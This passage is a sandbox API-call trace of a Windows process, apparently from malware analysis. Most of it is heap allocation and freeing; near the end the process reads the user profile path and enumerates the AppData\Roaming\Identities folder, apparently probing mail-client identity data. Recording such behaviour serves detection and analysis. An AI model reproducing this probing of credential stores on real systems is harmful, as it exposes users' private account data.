hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0199.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0199.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.411] CloseHandle (hObject=0x268) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0199.412] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0199.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.417] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0199.417] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.418] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0199.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Identities", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities", lpFilePart=0x8bedfc*="Identities") returned 0x38 [0199.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0199.419] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities")) returned 0x2010 [0199.420] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb67, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa57a0 [0199.420] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb67, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0199.420] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb67, dwReserved1=0x4, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0199.420] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb67, dwReserved1=0x4, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 0 [0199.420] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0199.420] GetLastError () returned 0x12 [0199.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.421] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 